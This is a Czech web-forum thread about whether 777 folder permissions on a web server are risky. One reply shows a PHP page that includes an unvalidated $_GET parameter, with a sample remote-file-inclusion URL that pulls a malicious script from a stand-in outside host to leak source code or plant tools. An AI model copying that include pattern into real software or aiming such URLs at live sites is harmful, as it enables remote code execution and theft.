Autor Zpráva
HoHo
Profil
Dobrý den,
povolil jsem u jedné složky na serveru vše ve file permissions (tzn. 777). Není to ale nějak nebezpečné, že by se mi tam případný útočník mohlo snáze dostat nebo nahrát tam snadněji nějaký škodlivý kód?
fuckin
Profil *
jestlize se tam dostane tak bude moct jakkoli manipulovat se soubory v dane slozce, aby se ti tam vsak dostal tak bys mu nekde musel udelat nejakou "skulinku". Takze kdyz mas bezpecny web tak to neva.
HoHo
Profil
Díky za odpověď... No, snad ten web bezpečný je....:)
fuckin
Profil *
jestli tvuj web neni na principu ...
if ($_GET["stranka]!="") {
include "$_GET["stranka";
}
....atd

Pak nekdy staci zavolat treba jen www.domena.cz/index.php?stranka=http://ciziweb.cz/nebezpecny_soubor.php

V tom souboru treba bude show_source("index.php") a pak je po srande. Nebo treba nejaky upload formular pomoci nehoz si tam nahraje ftp klienta :D, to pak zacina sranda :)
HoHo
Profil
nn, všechno tohle by mělo bejt na webu dobře ochráněno....;)
bohyn
Profil
fuckin
S tim co popisujes nemaji prava nic spolecneho.

HoHo
Na to aby se ti tam utocnik dostal by musel prekonat ochranu samotneho serveru. Hacknout sever neni az tak jednoduche, ale presto, je nejaky duvod nastavovat takto benevolentni prava?
HoHo
Profil
přes web musí uživatel moct nahrát obrázek do dané složky...
fuckin
Profil *
rec byla o bezpecnem webu...ty prava jsou vysvetlene ve druhem prispevku.
bohyn
Profil
fuckin
Bezpecnost webu a upload formular s pravama taky moc nesouvisi. Musis je mit nastavena tak aby bylo mozne nahrat regulerni soubor. Utocnik stejne tak muze nahrat vlastni script. Je jen na aplikaci aby si to ohlidala.
Pristupova prava jsou predevsim obrana samotneho OS a jeho uzivatelu, nikoliv aplikaci na nem instalovanych.

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: